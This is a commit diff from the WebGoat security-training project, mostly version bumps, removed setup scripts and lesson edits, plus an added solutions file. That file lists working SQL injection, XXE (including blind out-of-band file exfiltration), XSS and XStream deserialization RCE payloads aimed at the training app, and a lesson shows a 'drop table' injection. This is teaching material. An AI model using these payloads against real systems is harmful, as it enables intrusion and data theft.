wget https://github.com/WebGoat/WebGoat/releases/download/v8.0.0.RELEASE/webwolf-8.0.0.RELEASE.jar
sudo add-apt-repository ppa:openjdk-r/ppa
sudo apt-get update
sudo apt-get install openjdk-8-jre -y
SHELL
config.vm.provision "shell", run: "always", privileged: false, inline: <<-SHELL
java -jar webgoat-server-8.0.0.RELEASE.jar &
sleep 40s
java -jar webwolf-8.0.0.RELEASE.jar
SHELL
end

48
webgoat-images/vagrant-users/Vagrantfile vendored
View File

@ -1,48 +0,0 @@
#For now use the same as for developers but start WebGoat
#In the future we can add Docker as well and then Vagrant can start the
#Docker container or Chef which setups the Tomcat
Vagrant.configure(2) do |config|
config.vm.box = "boxcutter/ubuntu1604-desktop"
config.vm.network :forwarded_port, guest: 8080, host: 9999
config.vm.provider "virtualbox" do |vb|
vb.gui = false
vb.memory = "2048"
vb.cpus = 2
vb.name = "WebGoat-Users"
vb.customize ["modifyvm", :id, "--nictype1", "virtio"]
end
config.vm.provider "vmware_fusion" do |vf|
vf.gui = false
vf.vmx["memsize"] = 4096
vf.vmx["numvcpus"] = 2
vf.vmx["displayname"] = "WebGoat-Users"
end
config.ssh.shell = "bash -c 'BASH_ENV=/etc/profile exec bash'"
config.vm.provision 'shell' do |s|
s.path = '../vagrant_provision.sh'
s.privileged = true
end
config.vm.provision :shell, inline: <<-SHELL
echo -e "Cloning the WebGoat container repository"
git clone -b master https://github.com/WebGoat/WebGoat.git
echo -e "Cloning the WebGoat Lessons repository"
git clone -b master https://github.com/WebGoat/WebGoat-Lessons.git
echo -e "Compiling and installing the WebGoat Container lesson server....."
mvn -q -DskipTests -file WebGoat/pom.xml clean compile install
echo -e "Compiling and installing the WebGoat Lessons $COL_RESET"
mvn -q -DskipTests -file WebGoat-Lessons/pom.xml package
echo -e "Copying the compiled lessons jars into the container so we can start the lesson server with some base lessons"
cp -fa ./WebGoat-Lessons/target/plugins/*.jar ./WebGoat/webgoat-container/src/main/webapp/plugin_lessons/
nohup mvn -q -DskipTests -file WebGoat/pom.xml -pl webgoat-container tomcat7:run-war 0<&- &>/dev/null &
SHELL
config.vm.provision 'shell' do |s|
s.inline = "echo Finished provisioning, open a browser and browse to http://localhost:9999/WebGoat/"
end
end

62
webgoat-images/vagrant_provision.sh
View File

@ -1,62 +0,0 @@
#!/usr/bin/env bash
set -e
echo "Setting locale..."
sudo update-locale LC_ALL=en_US.UTF-8 LANG=en_US.UTF-8
sudo kill -9 $(lsof -t /var/lib/dpkg/lock) || true
sudo apt-get update
sudo apt-get install -y git
echo "Installing required packages..."
sudo apt-get install -y -q build-essential autotools-dev automake pkg-config expect
## Chrome
wget -q -O - https://dl-ssl.google.com/linux/linux_signing_key.pub | sudo apt-key add -
sudo sh -c 'echo "deb http://dl.google.com/linux/chrome/deb/ stable main" >> /etc/apt/sources.list.d/google.list'
sudo apt-get update
sudo apt-get install -y google-chrome-stable
## Java 8
echo "Provisioning Java 8..."
mkdir -p /home/vagrant/java
cd /home/vagrant/java
test -f /tmp/jdk-8-linux-x64.tar.gz || curl -q -L --cookie "oraclelicense=accept-securebackup-cookie" http://download.oracle.com/otn-pub/java/jdk/8u101-b13/jdk-8u101-linux-x64.tar.gz -o /tmp/jdk-8-linux-x64.tar.gz
sudo mkdir -p /usr/lib/jvm
sudo tar zxf /tmp/jdk-8-linux-x64.tar.gz -C /usr/lib/jvm
sudo update-alternatives --install "/usr/bin/java" "java" "/usr/lib/jvm/jdk1.8.0_101/bin/java" 1
sudo update-alternatives --install "/usr/bin/javac" "javac" "/usr/lib/jvm/jdk1.8.0_101/bin/javac" 1
sudo update-alternatives --install "/usr/bin/javaws" "javaws" "/usr/lib/jvm/jdk1.8.0_101/bin/javaws" 1
sudo chmod a+x /usr/bin/java
sudo chmod a+x /usr/bin/javac
sudo chmod a+x /usr/bin/javaws
sudo chown -R root:root /usr/lib/jvm/jdk1.8.0_101
echo "export JAVA_HOME=/usr/lib/jvm/jdk1.8.0_101" >> /home/vagrant/.bashrc
## Maven
echo "Installing Maven.."
sudo apt-get install -y maven
## ZAP
echo "Provisioning ZAP..."
cd /home/vagrant
mkdir tools
cd tools
wget https://github.com/zaproxy/zaproxy/releases/download/2.5.0/ZAP_2.5.0_Linux.tar.gz
tar xvfx ZAP_2.5.0_Linux.tar.gz
rm -rf ZAP_2.5.0_Linux.tar.gz
## IntelliJ
cd /home/vagrant/tools
wget https://download.jetbrains.com/idea/ideaIC-2016.1.4.tar.gz
tar xvfz ideaIC-2016.1.4.tar.gz
rm -rf ideaIC-2016.1.4.tar.gz
## Eclipse
sudo apt-get -y install eclipse

2
webgoat-lessons/auth-bypass/pom.xml
View File

@ -6,7 +6,7 @@
<parent>
<groupId>org.owasp.webgoat.lesson</groupId>
<artifactId>webgoat-lessons-parent</artifactId>
<version>8.0.0.M3</version>
<version>v8.0.0.M14</version>
</parent>
</project>

2
webgoat-lessons/bypass-restrictions/pom.xml
View File

@ -6,6 +6,6 @@
<parent>
<groupId>org.owasp.webgoat.lesson</groupId>
<artifactId>webgoat-lessons-parent</artifactId>
<version>8.0.0.M3</version>
<version>v8.0.0.M14</version>
</parent>
</project>

2
webgoat-lessons/challenge/pom.xml
View File

@ -6,7 +6,7 @@
<parent>
<groupId>org.owasp.webgoat.lesson</groupId>
<artifactId>webgoat-lessons-parent</artifactId>
<version>8.0.0.M3</version>
<version>v8.0.0.M14</version>
</parent>

1
webgoat-lessons/challenge/src/main/java/org/owasp/webgoat/plugin/Flag.java
View File

@ -46,7 +46,6 @@ public class Flag extends Endpoint {
@PostConstruct
public void initFlags() {
IntStream.range(1, 10).forEach(i -> FLAGS.put(i, UUID.randomUUID().toString()));
FLAGS.entrySet().stream().forEach(e -> log.debug("Flag {} {}", e.getKey(), e.getValue()));
}
@Override

2
webgoat-lessons/client-side-filtering/pom.xml
View File

@ -6,7 +6,7 @@
<parent>
<groupId>org.owasp.webgoat.lesson</groupId>
<artifactId>webgoat-lessons-parent</artifactId>
<version>8.0.0.M3</version>
<version>v8.0.0.M14</version>
</parent>
</project>

2
webgoat-lessons/cross-site-scripting/pom.xml
View File

@ -6,7 +6,7 @@
<parent>
<groupId>org.owasp.webgoat.lesson</groupId>
<artifactId>webgoat-lessons-parent</artifactId>
<version>8.0.0.M3</version>
<version>v8.0.0.M14</version>
</parent>
<build>
<plugins>

2
webgoat-lessons/cross-site-scripting/src/main/java/org/owasp/webgoat/plugin/CrossSiteScriptingLesson5a.java
View File

@ -64,7 +64,7 @@ public class CrossSiteScriptingLesson5a extends AssignmentEndpoint {
userSessionData.setValue("xss-reflected1-complete",(Object)"false");
StringBuffer cart = new StringBuffer();
cart.append("Thank you for shopping at WebGoat. <br />You're support is appreciated<hr />");
cart.append("<p>We have chaged credit card:" + field1 + "<br />");
cart.append("<p>We have charged credit card:" + field1 + "<br />");
cart.append( " ------------------- <br />");
cart.append( " $" + totalSale);

2
webgoat-lessons/csrf/pom.xml
View File

@ -6,6 +6,6 @@
<parent>
<groupId>org.owasp.webgoat.lesson</groupId>
<artifactId>webgoat-lessons-parent</artifactId>
<version>8.0.0.M3</version>
<version>v8.0.0.M14</version>
</parent>
</project>

2
webgoat-lessons/csrf/src/main/java/org/owasp/webgoat/plugin/CSRFLogin.java
View File

@ -33,7 +33,7 @@ public class CSRFLogin extends AssignmentEndpoint {
}
private void markAssignmentSolvedWithRealUser(String username) {
UserTracker userTracker = userTrackerRepository.findOne(username);
UserTracker userTracker = userTrackerRepository.findByUser(username);
userTracker.assignmentSolved(getWebSession().getCurrentLesson(), this.getClass().getSimpleName());
userTrackerRepository.save(userTracker);
}

2
webgoat-lessons/html-tampering/pom.xml
View File

@ -6,7 +6,7 @@
<parent>
<groupId>org.owasp.webgoat.lesson</groupId>
<artifactId>webgoat-lessons-parent</artifactId>
<version>8.0.0.M3</version>
<version>v8.0.0.M14</version>
</parent>
<dependencies>

2
webgoat-lessons/http-basics/pom.xml
View File

@ -6,7 +6,7 @@
<parent>
<groupId>org.owasp.webgoat.lesson</groupId>
<artifactId>webgoat-lessons-parent</artifactId>
<version>8.0.0.M3</version>
<version>v8.0.0.M14</version>
</parent>
</project>

8
webgoat-lessons/http-basics/src/main/resources/lessonPlans/en/HttpBasics_content1.adoc
View File

@ -1,8 +1,8 @@
Enter your name in the input field below and press "Go!" to submit. The server will accept the request, reverse the input and display it back to the user, illustrating the basics of handling an HTTP request.
The user should become familiar with the features of WebGoat by manipulating the above buttons to view hints, show the HTTP request parameters, the HTTP request cookies, and the Java source code. You may also try using OWASP ZAP Attack Proxy to see the HTTP data.
Enter your name in the input field below and press "Go!" to submit. The server will accept the request, reverse the
input and display it back to the user, illustrating the basics of handling an HTTP request.
== Try It!
Enter your name in the input field below and press "Go!" to submit. The server will accept the request, reverse the input and display it back to the user, illustrating the basics of handling an HTTP request.
Enter your name in the input field below and press "Go!" to submit. The server will accept the request, reverse the input
and display it back to the user, illustrating the basics of handling an HTTP request.

2
webgoat-lessons/http-proxies/pom.xml
View File

@ -6,7 +6,7 @@
<parent>
<groupId>org.owasp.webgoat.lesson</groupId>
<artifactId>webgoat-lessons-parent</artifactId>
<version>8.0.0.M3</version>
<version>v8.0.0.M14</version>
</parent>
<dependencies>

2
webgoat-lessons/idor/pom.xml
View File

@ -6,7 +6,7 @@
<parent>
<groupId>org.owasp.webgoat.lesson</groupId>
<artifactId>webgoat-lessons-parent</artifactId>
<version>8.0.0.M3</version>
<version>v8.0.0.M14</version>
</parent>
</project>

2
webgoat-lessons/insecure-login/pom.xml
View File

@ -6,7 +6,7 @@
<parent>
<groupId>org.owasp.webgoat.lesson</groupId>
<artifactId>webgoat-lessons-parent</artifactId>
<version>8.0.0.M3</version>
<version>v8.0.0.M14</version>
</parent>
<dependencies>

2
webgoat-lessons/jwt/pom.xml
View File

@ -6,7 +6,7 @@
<parent>
<groupId>org.owasp.webgoat.lesson</groupId>
<artifactId>webgoat-lessons-parent</artifactId>
<version>8.0.0.M3</version>
<version>v8.0.0.M14</version>
</parent>
</project>

2
webgoat-lessons/missing-function-ac/pom.xml
View File

@ -6,7 +6,7 @@
<parent>
<groupId>org.owasp.webgoat.lesson</groupId>
<artifactId>webgoat-lessons-parent</artifactId>
<version>8.0.0.M3</version>
<version>v8.0.0.M14</version>
</parent>
</project>

4
webgoat-lessons/pom.xml
View File

@ -5,12 +5,12 @@
<groupId>org.owasp.webgoat.lesson</groupId>
<artifactId>webgoat-lessons-parent</artifactId>
<packaging>pom</packaging>
<version>8.0.0.M3</version>
<version>v8.0.0.M14</version>
<parent>
<groupId>org.owasp.webgoat</groupId>
<artifactId>webgoat-parent</artifactId>
<version>8.0.0.M3</version>
<version>v8.0.0.M14</version>
</parent>
<modules>

111
webgoat-lessons/sol.MD Normal file
View File

@ -0,0 +1,111 @@
### SQLi ###
Basic
Smith - to show it returns smith's records.
To show exploit; `1=1` can be any true clause:
```sql
Smith' or '1'='1
```
**Bender Login**
```sql
bender@juice-sh.op' --
```
```sql
[2:19 PM]
101
101 or 1=1
```
```sql
Smith' union select userid,user_name, password,cookie,cookie, cookie,userid from user_system_data --
```
## XXE ##
Simple:
```xml
<?xml version="1.0" standalone="yes" ?><!DOCTYPE user [<!ENTITY root SYSTEM "file:///"> ]><comment><text>&root;</text></comment>
```
Modern Rest Framework:
Change content type to: `Content-Type: application/xml` and
```xml
<?xml version="1.0" standalone="yes" ?><!DOCTYPE user [<!ENTITY root SYSTEM "file:///"> ]><user> <username>&root;</username><password>test</password></user>
```
Blind SendFile
```xml
Solution:
Create DTD:
<pre>
<?xml version="1.0" encoding="UTF-8"?>
<!ENTITY % file SYSTEM "file:///c:/windows-version.txt">
<!ENTITY % all "<!ENTITY send SYSTEM 'http://localhost:8080/WebGoat/XXE/ping?text=%file;'>">
%all;
</pre>
This will be reduced to:
<pre>
<!ENTITY send SYSTEM 'http://localhost:8080/WebGoat/XXE/ping?text=[contents_file]'>
</pre>
Wire it all up in the xml send to the server:
<pre>
<?xml version="1.0"?>
<!DOCTYPE root [
<!ENTITY % remote SYSTEM "http://localhost:8080/WebGoat/plugin_lessons/XXE/test.dtd">
%remote;
]>
<user>
<username>test&send;</username>
</user>
</pre>
```
### XSS ###
```javascript
<script>alert('my javascript here')</script>4128 3214 0002 1999
```
DOM-XSS:
Something like
`http://localhost:8080/WebGoat/start.mvc#test/testParam=foobar&_someVar=234902384lotslsfjdOf9889080GarbageHere%3Cscript%3Ewebgoat.customjs.phoneHome();%3C%2Fscript%3E
//`
OR
`http://localhost:8080/WebGoat/start.mvc#test/testParam=foobar&_someVar=234902384lotslsfjdOf9889080GarbageHere<script>webgoat.customjs.phoneHome();<%2Fscript>`
### Vuln - Components ###
Jquery page: - it is contrived; but paste that in each box
```javascript
OK<script>alert("XSS")<\/script>
OK<script>alert("XSS")<\/script>
```
for the deserialization: got to the link: http://www.pwntester.com/blog/2013/12/23/rce-via-xstream-object-deserialization38/ to read about why it works so you can talk to it.
```html
<sorted-set>
<string>foo</string>
<dynamic-proxy>
<interface>java.lang.Comparable</interface>
<handler class="java.beans.EventHandler">
<target class="java.lang.ProcessBuilder">
<command>
<string>/Applications/Calculator.app/Contents/MacOS/Calculator</string>
</command>
</target>
<action>start</action>
</handler>
</dynamic-proxy>
</sorted-set>
```

2
webgoat-lessons/sql-injection/pom.xml
View File

@ -6,6 +6,6 @@
<parent>
<groupId>org.owasp.webgoat.lesson</groupId>
<artifactId>webgoat-lessons-parent</artifactId>
<version>8.0.0.M3</version>
<version>v8.0.0.M14</version>
</parent>
</project>

30
webgoat-lessons/sql-injection/src/main/resources/lessonPlans/en/SqlInjection_content6.adoc
View File

@ -1,15 +1,29 @@
== Special Characters
/* */ are inline comments
-- , # are line comments
'Select * from users where name = admin--and pass = pass'
[source]
----
/* */ are inline comments
-- , # are line comments
; allows query chaining
'Select * from users; drop table users;'
Example: Select * from users where name = 'admin' --and pass = 'pass'
----
[source]
----
; allows query chaining
Example: Select * from users; drop table users;
----
[source]
----
',+,|| allows string concatenation
Char() strings without quotes
Example: Select * from users where name = '+char(27) or 1=1
----
,+,|| allows string concatenation
Char() strings without quotes
'Select * from users where name = +char(27) or 1=1'
== Special Statements

2
webgoat-lessons/vulnerable-components/pom.xml
View File

@ -6,7 +6,7 @@
<parent>
<groupId>org.owasp.webgoat.lesson</groupId>
<artifactId>webgoat-lessons-parent</artifactId>
<version>8.0.0.M3</version>
<version>v8.0.0.M14</version>
</parent>
<dependencies>
<dependency>

2
webgoat-lessons/webgoat-introduction/pom.xml
View File

@ -6,6 +6,6 @@
<parent>
<groupId>org.owasp.webgoat.lesson</groupId>
<artifactId>webgoat-lessons-parent</artifactId>
<version>8.0.0.M3</version>
<version>v8.0.0.M14</version>
</parent>
</project>

70
webgoat-lessons/webgoat-lesson-template/getting-started.MD Normal file
View File

@ -0,0 +1,70 @@
### To include lesson template in build ###
1. Edit the webgoat-server/pom.xml file and uncomment the section under
```xml
<!--uncommment below to run/include lesson template in WebGoat Build-->
```
2. Also uncomment in webgoat-lessons/pom.xml where it says
```xml
<!-- uncomment below to include lesson template in build, also uncomment the dependency in webgoat-server/pom.xml-->
```
### To add a lesson to WebGoat ###
There are a number of moving parts and this sample lesson will help you navigate those parts. Most of your work will be done in two directories. To start though, you can copy this directory with the name of your-lesson in the webgoat-lessons directory.
0. The POM file
* Change the line to give your lesson its own artifactId.
That should be all you need to do there:
```xml
<artifactId>webgoat-lesson-template</artifactId>
```
1. The Base Class
* The name of the class (file and class name) to better match your lesson. (e.g. `sql-injection` >> `SqlInjection`)
* The category in which you want your lesson to be in. You can create a new category if you want, or put in an issue to have one added.
* The `defaultRanking` will move your lesson up or down in the categories list.
* Implement a new key name pair `lesson-template.title` (the key) and update the same key/value pair `your.key=your value` in src/main/resources/i18n/WebGoatLabels.properties.
* Implement a new value for the `getId` method, which leads us to...
2. The HTML content framing
* Rename the provided file in src/main/resources/html using your value from the `getId` method in your lesson's base class:
e.g.
`public String getId() { return "your-lesson"; }` >> `your-lesson.html`
* Modify that file following the commented instructions in there.
* In conjunction with this file you.
3. Assignment Endpoints
* In the above html file, you will see an example of an 'attack form'. You can create endpoints to handle these attacks and provide the user feedback and simulated output. See the example file here as well as other existing lessons for ways to extend these. You will extend the `AssignmentEndpoint` as the example will show:
* You can also create supporting (non-assignment) endpoints, that are not evaluated/graded.
* See other lesson examples for creating unit/integration tests for your project as well.
4. Getting your lesson to show up
* Modify the webgoat-lessons/pom.xml to include your project in the `<modules>` section:
```xml
<modules>
<!-- ... -->
<module>webgoat-lesson-template</module>
<!-- ... -->
</modules>
```
* Modify the webgoat-server/pom.xml to add your project as a dependency in the `<dependencies>` section:
```xml
<dependencies>
<!-- .... >
<dependency>
<groupId>org.owasp.webgoat.lesson</groupId>
<artifactId>your-artfifact-id-here</artifactId>
<version>${project.version}</version>
</dependency>
<!-- .... >
</dependencies>
```
5. You should be ready to run and test your project. Please create issues at https://github.com/WebGoat/WebGoat if there errors or confusion with this documentation/template

55
webgoat-lessons/webgoat-lesson-template/getting-started.txt
View File

@ -1,55 +0,0 @@
##### To include lesson template in build #####
1. edit theh webgoat-server/pom.xml file and uncomment the section under ...
<!--uncommment below to run/include lesson template in WebGoat Build-->
2. Also uncomment in webgoat-lessons/pom.xml where it says ...
<!-- uncomment below to include lesson template in build, also uncomment the dependency in webgoat-server/pom.xml-->
##### To add a lesson to WebGoat #####
There are a number of moving parts and this sample lesson will help you navigate those parts. Most of your work will be done in two directories. To start though, you can copy this directory with the name of your-lesson in the webgoat-lessons directory.
0. The POM file
a. change the ...
<artifactId>webgoat-lesson-template</artifactId>
... line to give your lesson its own artifactId.That should be all you need to do there
1. The Base Class ...
a. The name of the class (file and class name) to better match your lesson (e.g. sql-injection >> SqlInjection)
b. the category in which you want your lesson to be in. You can create a new category if you want, or put in an issue to have one added
c. The 'defaultRanking' will move your lesson up or down in the categories list
d. implement a new key name pair "lesson-template.title" (the key) and update the same key/value pair (your.key=your value) in src/main/resources/i18n/WebGoatLabels.properties
e. Implement a new value for the getId method, which leads us to ...
2. The HTML content framing ...
a. Rename the provided file in src/main/resources/html using your value from the getId method in your lesson's base class (e.g. public String getId() { return "your-lesson"; } >> "your-lesson.html")
b. Modify that file following the commented instructions in there
c. In conjunction with this file you
3. Assignment Endpoints
a. In the above html file, you will see an example of an 'attack form'. You can create endpoints to handle these attacks and provide the user feedback and simulated output. See the example file here as well as other existing lessons for ways to extend these. You will extend the AssignmentEndpoint as the example will show
b. You can also create supporting (non-assignment) endpoints, that are not evaluated/graded.
c. See other lesson examples for creating unit/integration tests for your project as well
4. Getting your lesson to show up
a. modify the webgoat-lessons/pom.xml to include your project in the <modules> section
<modules>
<!-- ... -->
<module>webgoat-lesson-template</module>
<!-- ... -->
</modules>
b. modify the webgoat-server/pom.xml to add your project as a dependency in the <dependencies> section ...
<dependencies>
<!-- .... >
<dependency>
<groupId>org.owasp.webgoat.lesson</groupId>
<artifactId>your-artfifact-id-here</artifactId>
<version>${project.version}</version>
</dependency>
<!-- .... >
<dependencies>
5. You should be ready to run and test your project. Please create issues at https://github.com/WebGoat/WebGoat if there errors or confusion with this documentation/template

2
webgoat-lessons/webwolf-introduction/pom.xml
View File

@ -6,6 +6,6 @@
<parent>
<groupId>org.owasp.webgoat.lesson</groupId>
<artifactId>webgoat-lessons-parent</artifactId>
<version>8.0.0.M3</version>
<version>v8.0.0.M14</version>
</parent>
</project>

2
webgoat-lessons/webwolf-introduction/src/main/java/org/owasp/webgoat/plugin/WebWolfIntroduction.java
View File

@ -48,7 +48,7 @@ public class WebWolfIntroduction extends NewLesson {
@Override
public Integer getDefaultRanking() {
return 1;
return 10;
}
@Override

6
webgoat-lessons/webwolf-introduction/src/main/resources/lessonPlans/en/IntroductionWebWolf.adoc
View File

@ -23,9 +23,9 @@ java -jar webwolf-<<version>>.jar
WebWolf is also available as a Docker container:
```
docker pull webwolf/webwolf-8.0
docker pull webgoat/webwolf
docker run -it 8081:8081 /home/webwolf/run.sh
```
This will start the application on port 8081, in your browser type: `http://localhost:8081/WebWolf`
You will be redirected to the login page where you need to login with your WebGoat username and password
This will start the application on port 8081, click webWolfLink:here[] to open WebWolf.
First thing you need to do is register a new user within WebWolf.

2
webgoat-lessons/xxe/pom.xml
View File

@ -6,7 +6,7 @@
<parent>
<groupId>org.owasp.webgoat.lesson</groupId>
<artifactId>webgoat-lessons-parent</artifactId>
<version>8.0.0.M3</version>
<version>v8.0.0.M14</version>
</parent>
<dependencies>

18
webgoat-lessons/xxe/src/main/java/org/owasp/webgoat/plugin/ContentTypeAssignment.java
View File

@ -46,7 +46,7 @@ import static org.springframework.http.MediaType.APPLICATION_JSON_VALUE;
@AssignmentHints({"xxe.hints.content.type.xxe.1", "xxe.hints.content.type.xxe.2"})
public class ContentTypeAssignment extends AssignmentEndpoint {
private final static String[] DEFAULT_LINUX_DIRECTORIES = {"usr", "opt", "var"};
private final static String[] DEFAULT_LINUX_DIRECTORIES = {"usr", "etc", "var"};
private final static String[] DEFAULT_WINDOWS_DIRECTORIES = {"Windows", "Program Files (x86)", "Program Files"};
@ -84,13 +84,13 @@ public class ContentTypeAssignment extends AssignmentEndpoint {
return trackProgress(attackResult);
}
private boolean checkSolution(Comment comment) {
String[] directoriesToCheck = OS.isFamilyUnix() ? DEFAULT_LINUX_DIRECTORIES : DEFAULT_WINDOWS_DIRECTORIES;
boolean success = true;
for (String directory : directoriesToCheck) {
success &= org.apache.commons.lang3.StringUtils.contains(comment.getText(), directory);
}
return success;
}
private boolean checkSolution(Comment comment) {
String[] directoriesToCheck = OS.isFamilyMac() || OS.isFamilyUnix() ? DEFAULT_LINUX_DIRECTORIES : DEFAULT_WINDOWS_DIRECTORIES;
boolean success = true;
for (String directory : directoriesToCheck) {
success &= org.apache.commons.lang3.StringUtils.contains(comment.getText(), directory);
}
return success;
}
}

17
webgoat-lessons/xxe/src/main/java/org/owasp/webgoat/plugin/SimpleXXE.java
View File

@ -54,7 +54,7 @@ import static org.springframework.web.bind.annotation.RequestMethod.POST;
@AssignmentHints({"xxe.hints.simple.xxe.1", "xxe.hints.simple.xxe.2", "xxe.hints.simple.xxe.3", "xxe.hints.simple.xxe.4"})
public class SimpleXXE extends AssignmentEndpoint {
private final static String[] DEFAULT_LINUX_DIRECTORIES = {"usr", "opt", "var"};
private final static String[] DEFAULT_LINUX_DIRECTORIES = {"usr", "etc", "var"};
private final static String[] DEFAULT_WINDOWS_DIRECTORIES = {"Windows", "Program Files (x86)", "Program Files"};
@Value("${webgoat.server.directory}")
@ -77,13 +77,12 @@ public class SimpleXXE extends AssignmentEndpoint {
}
return trackProgress(failed().output(error).build());
}
private boolean checkSolution(Comment comment) {
String[] directoriesToCheck = OS.isFamilyUnix() ? DEFAULT_LINUX_DIRECTORIES : DEFAULT_WINDOWS_DIRECTORIES;
boolean success = true;
for (String directory : directoriesToCheck) {
success &= comment.getText().contains(directory);
}
return success;
}
String[] directoriesToCheck = OS.isFamilyMac() || OS.isFamilyUnix() ? DEFAULT_LINUX_DIRECTORIES : DEFAULT_WINDOWS_DIRECTORIES;
boolean success = true;
for (String directory : directoriesToCheck) {
success &= org.apache.commons.lang3.StringUtils.contains(comment.getText(), directory);
}
return success;
}
}

15
webgoat-server/Dockerfile
View File

@ -2,13 +2,14 @@ FROM openjdk:8-jre-slim
ARG webgoat_version=8.0-SNAPSHOT
RUN useradd --home-dir /home/webgoat --create-home -U webgoat
RUN apt-get update; apt-get install curl -y
COPY start.sh /home/webgoat/start.sh
RUN chmod +x /home/webgoat/start.sh
RUN \
apt-get update && apt-get install && \
useradd --home-dir /home/webgoat --create-home -U webgoat && \
cd /home/webgoat/; mkdir -p .webgoat
USER webgoat
RUN cd /home/webgoat/; mkdir -p .webgoat
COPY target/webgoat-server-${webgoat_version}.jar /home/webgoat/webgoat.jar
ENTRYPOINT ["java", "-Djava.security.egd=file:/dev/./urandom", "-jar", "/home/webgoat/webgoat.jar", "--server.address=0.0.0.0"]
EXPOSE 8080

2
webgoat-server/pom.xml
View File

@ -6,7 +6,7 @@
<parent>
<groupId>org.owasp.webgoat</groupId>
<artifactId>webgoat-parent</artifactId>
<version>8.0.0.M3</version>
<version>v8.0.0.M14</version>
</parent>
<properties>

3
webgoat-server/start.sh
View File

@ -1,3 +0,0 @@
#!/bin/sh
java -jar -Djava.security.egd=file:/dev/./urandom /home/webgoat/webgoat.jar

146
webgoat_developer_bootstrap.sh
View File

@ -1,146 +0,0 @@
#!/bin/bash
# Bootstrap the setup of WebGoat for developer use in Linux and Mac machines
# This script will clone the necessary git repositories, call the maven goals
# in the order the are needed and launch tomcat listening on localhost:8080
# Happy hacking !
# Find out what is our terminal size
COLS="$(tput cols)"
if (( COLS <= 0 )) ; then
COLS="${COLUMNS:-80}"
fi
# Colors
ESC_SEQ="\x1b["
COL_RESET=$ESC_SEQ"39;49;00m"
COL_RED=$ESC_SEQ"31;01m"
COL_GREEN=$ESC_SEQ"32;01m"
COL_YELLOW=$ESC_SEQ"33;01m"
COL_BLUE=$ESC_SEQ"34;01m"
COL_MAGENTA=$ESC_SEQ"35;01m"
COL_CYAN=$ESC_SEQ"36;01m"
# Horizontal Rule function
horizontal_rule() {
local WORD
for WORD in "#"
do
hr "$WORD"
done
}
hr() {
local WORD="$1"
if [[ -n "$WORD" ]] ; then
local LINE=''
while (( ${#LINE} < COLS ))
do
LINE="$LINE$WORD"
done
echo -e "${LINE:0:$COLS}"
fi
}
## test if command exists
ftest() {
echo -e "$COL_CYAN info: Checking if ${1} is installed $COL_RESET"
if ! type "${1}" > /dev/null 2>&1; then
return 1
else
return 0
fi
}
## feature tests
features() {
for f in "${@}"; do
ftest "${f}" || {
echo -e >&2 "***$COL_RED ERROR: Missing \`${f}'! Make sure it exists and try again. $COL_RESET"
return 1
}
done
return 0
}
tomcat_started () {
STAT=`netstat -na | grep 8080 | awk '{print $6}'`
if [ "$STAT" = "LISTEN" ]; then
echo -e "$COL_GREEN WebGoat has started successfully! Browse to the following address. $COL_RESET"
echo -e "$COL_CYAN Happy Hacking! $COL_RESET"
return 0
elif [ "$STAT" = "" ]; then
echo -e "$COL_RED WebGoat failed to start up.... please wait run the following command for debugging : $COL_RESET"
echo -e "$COL_MAGENTA mvn -q -file WebGoat/pom.xml -pl webgoat-container tomcat7:run-war"
fi
return 1
}
## main setup
developer_bootstrap() {
horizontal_rule
echo -e "$COL_RED
██╗ ██╗███████╗██████╗ ██████╗ ██████╗ █████╗ ████████╗
██║ ██║██╔════╝██╔══██╗██╔════╝ ██╔═══██╗██╔══██╗╚══██╔══╝
██║ █╗ ██║█████╗ ██████╔╝██║ ███╗██║ ██║███████║ ██║
██║███╗██║██╔══╝ ██╔══██╗██║ ██║██║ ██║██╔══██║ ██║
╚███╔███╔╝███████╗██████╔╝╚██████╔╝╚██████╔╝██║ ██║ ██║
╚══╝╚══╝ ╚══════╝╚═════╝ ╚═════╝ ╚═════╝ ╚═╝ ╚═╝ ╚═╝
$COL_RESET"
horizontal_rule
echo -e "Welcome to the WebGoat Developer Bootstrap script for Linux/Mac."
echo -e "Now checking if all the required software to run WebGoat is already installed."
echo -e "FYI: This Developer Bootstrap Script for WebGoat requires: Git, Java JDK and Maven accessible on the path"
## test for require features
features git mvn java || return $?
# Clone WebGoat from github
if [ ! -d "WebGoat" ]; then
echo -e "Cloning the WebGoat container repository"
git clone https://github.com/WebGoat/WebGoat.git
else
horizontal_rule
(
echo -e "$COL_YELLOW The WebGoat container repo has already been clonned before, pulling upstream changes. $COL_RESET"
cd WebGoat || {
echo -e >&2 "$COL_RED *** ERROR: Could not cd into the WebGoat Directory. $COL_RESET"
return 1
}
git pull origin develop
)
fi
# Start the embedded Tomcat server
echo -e "$COL_MAGENTA"
horizontal_rule
horizontal_rule
horizontal_rule
horizontal_rule
echo "$COL_MAGENTA"
echo "$COL_CYAN ***** Starting WebGoat using the embedded Tomcat ***** $COL_RESET"
echo " Please be patient.... The startup of the server takes about 5 seconds..."
echo " WebGoat will be ready for you when you see the following message on the command prompt:"
echo "$COL_YELLOW INFO: Starting ProtocolHandler ["http-bio-8080"] $COL_RESET"
echo "$COL_CYAN When you see the message above, open a web browser and navigate to http://localhost:8080/WebGoat/ $COL_RESET"
echo " To stop the WebGoat and Tomcat Execution execution, press CTRL + C"
echo "$COL_RED If you close this terminal window, Tomcat and WebGoat will stop running $COL_RESET"
echo "$COL_MAGENTA"
horizontal_rule
horizontal_rule
horizontal_rule
horizontal_rule
echo -e "$COL_RESET"
sleep 5
# Starting WebGoat
mvn -q -pl webgoat-server spring-boot:run
}
# Start main script
developer_bootstrap

13
webwolf/Dockerfile
View File

@ -2,12 +2,13 @@ FROM openjdk:8-jre-slim
ARG webwolf_version=8.0-SNAPSHOT
RUN useradd --home-dir /home/webwolf --create-home -U webwolf
RUN apt-get update; apt-get install curl -y
COPY start.sh /home/webwolf/start.sh
RUN chmod +x /home/webwolf/start.sh
RUN \
apt-get update && apt-get install && \
useradd --home-dir /home/webwolf --create-home -U webwolf
USER webwolf
COPY target/webwolf-${webwolf_version}.jar /home/webwolf/webwolf.jar
ENTRYPOINT ["java", "-Djava.security.egd=file:/dev/./urandom", "-jar", "/home/webwolf/webwolf.jar", "--server.address=0.0.0.0"]
EXPOSE 8081

9
webwolf/pom.xml
View File

@ -6,7 +6,7 @@
<parent>
<groupId>org.owasp.webgoat</groupId>
<artifactId>webgoat-parent</artifactId>
<version>8.0.0.M3</version>
<version>v8.0.0.M14</version>
</parent>
<dependencies>
@ -78,6 +78,13 @@
<artifactId>hsqldb</artifactId>
<version>${hsqldb.version}</version>
</dependency>
<!-- ************* START: Dependencies for Unit and Integration Testing ************** -->
<dependency>
